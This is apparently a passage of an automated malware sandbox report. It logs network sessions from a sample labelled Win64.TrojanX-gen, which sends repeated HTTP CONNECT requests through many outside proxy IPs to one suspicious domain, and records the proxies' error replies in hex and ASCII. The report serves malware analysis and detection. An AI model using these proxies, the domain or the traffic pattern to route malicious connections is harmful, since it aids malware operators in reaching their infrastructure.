                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                983192.168.2.852984154.118.228.212805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.960278034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                984192.168.2.85263220.78.102.191805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.962054968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.991908073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.999922991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.195077896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                985192.168.2.853038119.28.60.6480905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.969841957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.275105000 CET315INHTTP/1.1 400 Bad Request
                                                                                Server: hzg/hzg
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 168
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 7a 67 2f 68 7a 67 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>hzg/hzg</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                986192.168.2.853144192.210.228.28156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.978101969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                987192.168.2.853027128.199.202.12280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.986377954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.889153004 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                988192.168.2.853060203.222.24.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.987410069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.297027111 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                989192.168.2.853031171.248.219.10810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.004268885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                990192.168.2.85312247.229.171.15031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.012932062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.492013931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195029974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.382545948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.679538965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.882642984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.179497957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679536104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                991192.168.2.853075203.171.19.98805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.012943029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.337385893 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.10.2
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                992192.168.2.851931174.64.199.7941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.013221979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                993192.168.2.85279435.207.123.94805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.019933939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.049401045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.194958925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.339044094 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                Feb 23, 2024 14:28:42.339051008 CET294INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyou


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                994192.168.2.853157185.162.230.178805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.021935940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.109334946 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                995192.168.2.85275627.75.149.16910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.054290056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                996192.168.2.853124103.113.71.23010815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.063112020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                997192.168.2.852532107.181.168.14541455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.075984955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                998192.168.2.85310727.65.116.24310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.132122993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                999192.168.2.85311247.243.205.131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.193043947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1000192.168.2.85311347.242.15.120156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.205912113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1001192.168.2.85311543.133.80.236156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.209503889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1002192.168.2.853114171.247.98.9010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.209897995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1003192.168.2.85315845.138.87.23810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.214191914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1004192.168.2.84982396.36.50.99395935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.250757933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1005192.168.2.852826171.247.241.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.250757933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1006192.168.2.853178185.101.16.52805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.251110077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1007192.168.2.85298814.97.48.44805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.255420923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1008192.168.2.853135223.113.80.15890915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.255434036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.641558886 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.1
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1009192.168.2.852838181.78.11.2179995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.289067984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.356494904 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1010192.168.2.853148178.128.113.118231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.289248943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991872072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.491225958 CET536INHTTP/1.1 502 Bad Gateway
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3597
                                                                                X-Squid-Error: ERR_CONNECT_FAIL 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The r


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1011192.168.2.852158103.230.126.123578215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.320653915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382558107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.383358955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
